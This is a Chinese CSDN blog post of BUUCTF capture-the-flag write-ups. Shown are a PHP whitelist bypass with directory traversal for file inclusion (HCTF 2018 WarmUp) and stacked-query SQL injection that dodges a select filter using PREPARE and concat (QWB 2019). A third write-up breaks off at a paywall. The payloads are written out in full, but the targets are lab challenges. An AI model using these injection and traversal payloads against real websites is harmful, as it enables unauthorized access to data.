BUUCTF持续更新中

最新推荐文章于 2024-07-20 13:57:53 发布
最新推荐文章于 2024-07-20 13:57:53 发布
阅读量486 收藏 2
点赞数 1
分类专栏: 刷题记 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/109162753
版权
这篇博客主要记录了作者参加的多个CTF赛事,包括HCTF、强网杯、SUCTF等,重点讲述了遇到的各种SQL注入题目。文章详细分析了如何利用SQL注入漏洞,如通过堆叠查询、预处理语句、符号过滤绕过等方法,以及文件包含、源码泄露等其他攻击手段,展示了攻防过程和解题思路。
摘要由CSDN通过智能技术生成

目录

[HCTF 2018]WarmUp

这里补充一个知识点:phpmyadmin 4.8.1任意文件包含

环境我已经启动了
在这里插入图片描述
去访问一下

在这里插入图片描述
源码有提示 去访问一下

在这里插入图片描述然后看到了源码

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

在这里插入图片描述
这里白名单里给了一个提示

在这里插入图片描述尝试直接去访问它

在这里插入图片描述
报错了…

尝试穿越目录去访问

在这里插入图片描述依然报错了

看源码吧

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//这里是提供了两个白名单
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(  //返回中文字符串的一部分
                $page,
                0,
                mb_strpos($page . '?', '?')  

//我们输入flag  但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4

//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了

            );
            if (in_array($_page, $whitelist)) {  //检测是不是在白名单
/hint.php?flag  进行绕过  进行目录穿越就可以了
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//上面是定义了一个类

    if (! empty($_REQUEST['file'])  //如果变量不存在的话,empty()并不会产生警告。 
        && is_string($_REQUEST['file'])  //必须是字符串
        && emmm::checkFile($_REQUEST['file'])  //上面的那个类
    ) {
        include $_REQUEST['file'];  //就包含这个文件   参数也就是file
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

所以 最后就是 这样

?file=hint.php?../../../../../../../../ffffllllaaaagggg

就得到了flag

在这里插入图片描述
flag{acbbba26-c81b-4603-bcb7-25f78adeab18}

[强网杯 2019]随便注

进入题目链接

在这里插入图片描述

  • 1.输入:1' 查看注入类型

在这里插入图片描述
所以他的sql语句是单引号过滤

  • 2.查看字段 (为2)

1' order by 2#

在这里插入图片描述

  • 3.显示回显

1' union select 1,2#
在这里插入图片描述相当于告诉了我们它的过滤

尝试用堆叠查询试试了

  • 4.查库

1;show database();

在这里插入图片描述

  • 5.查表

1';show tables;#

在这里插入图片描述
所以是有两个表

1919810931114514

words
  • 6.查列
1';show columns from `words`;#

在这里插入图片描述

表名words需要被 ` 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名)

1';show columns from `1919810931114514`;#

在这里插入图片描述看到flag了!!!

那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多

这里通过 MYSQL的预处理语句,使用 :

concat('s','elect',' * from `1919810931114514`')

完成绕过

构造pyload:

1';PREPARE test from concat('s','elect','* from `1919810931114514`');EXECUTE test;#

在这里插入图片描述

flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81}

[SUCTF 2019]EasySQL

环境我已经启动了 进入题目链接

在这里插入图片描述

老套路 先看看源码里面有什么东西

在这里插入图片描述

不出意料的什么都没有

但是提示我们它是POST传参

这是一道SQL注入的题目

不管输入什么数字,字母 都是这的 没有回显

在这里插入图片描述
但是输入:0没有回显 不知道为啥

最低0.47元/天 解锁文章
每天都要努力哇
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf misc-持续更新
zbbjya的博客
05-13 870
你居然赶我走 打开发现图片没什么信息 用winhex打开然后查找就好,会出flag 有n多种解决方法 将key.exe用winhex打开 看头文件名发现是data 然后后面像bse64编码 将使用base64编码转图片 KEY{dca57f966e4e4e31fd5b15417da63269} 扫描得到 但是记得把key改为flag 大白 发现图片只有一半 猜测flag在图片上 使用010将图片宽高调整以实现大白全部显现出来 将这里的01后面的00改为DF flag{He1l0_d4_ba1} 基础
BUUCTF
qq_18669681的博客
08-08 840
随便注 根据题目判断就初步判断为注入。 但还是测试 1. ‘ 报错 2.’ or ‘’=’ 回显正常 尝试进行注入时发现对注入的常用关键词都进行了过滤。 进行堆叠注入查询表名 1';show tables; 查询字段 show coloums from 查询表的内容有多种方法,我使用的是多语句执行。 1';Set @x=0x73656c65637420666c61672066726f6d20...
buuctf练习之[羊城杯2020]easyphp
最新发布
dalaojiaoweb的博客
07-20 462
在这里我尝试过写入一句话木马但是连接一直返回空数据。想来是只能使用.htaccess文件来解析触发PHP文件达到一个攻击的目的了。
buuctf
weixin_57439582的博客
01-01 325
ACTF2020 新生赛Exec1
BUUCTF之MISC(持续更新
12-21
kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用...
BUUCTF【pwn】解题记录(4-6页持续更新
Assassin
08-06 2039
一起继续刷BUUCTF把~
BUUCTF [Misc 1](持续更新
夜思红尘的博客
04-14 405
这里是关于buuctf平台的一些隐写题,有GIF图片隐写,LSB,二维码,ascii隐写。提供思路,可以借鉴(适合新手)
Buuctf
qq_52761202的博客
08-20 244
Http F12,发现Secret.php 访问 referer:https://www.Sycsecret.com User-Agent:Syclover browser 本地访问:127.0.0.1 开伪代理 Easy calc 看一下页面源码,发现了提示: calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#
buuctf(pwn)
个人笔记
04-04 3041
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF(变异凯撒)
Bigotry77的博客
07-26 1887
小白看到题目的第一眼应该是没有思路,(我指的是纯小白) 我看到这个txt的文本时就自动把afZ_和flag{}对上了。。。然后再看,偏移量?肯定不是,字母对不上,再看ASCII a, f, Z, _的ASCII码是 97, 102, 90, 95 而再看这里flag的ASCII码是102,108,97,103; 每个对应的都会相差5,可以自己推,不过感觉比较麻烦。。。 然后用python写个脚本:(借鉴的) def b_kaisa(str): first_step = 5 #首..
BUUCTF(刷题日记)
weixin_74022830的博客
03-23 1043
BUUCTFweb刷题记录
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 413
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
buuctf——(ACTF)rome
yhfgs的博客
05-24 925
1.下载得到rome.exe,丢到DIE查壳,无壳,32位文件。 2.丢到IDA,找到main,F5. 3.分析代码,其主要内容在两个while循环(从定义可知flag位16个字符)。 看第二个循环,可知是比较result和经过第一个循环得到的v1比较(就是flag经过第一个循环后变成了result(v12))并且可以从开头看出v12=Qsw3sj_lz4_Ujw@l。 再看第一个循环,发现是凯撒密码(看了老半天),大写字母平移12位,小写字母平移8位,其他字符不变。 直接上脚本(
BUUCTF(5)
遇事不决冲冲冲
02-28 3060
[CISCN 2019 初赛]Love Math 1 [De1CTF 2019]SSRF Me 1
BUUCTF:黑客帝国
末初的CSDN博客
11-01 4760
题目地址:https://buuoj.cn/challenges#%E9%BB%91%E5%AE%A2%E5%B8%9D%E5%9B%BD 开头很像RAR文件的十六进制数据,利用脚本将这些数据以二进制流形式写入文件
buuctfUpload-Labs-Linux
07-16
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值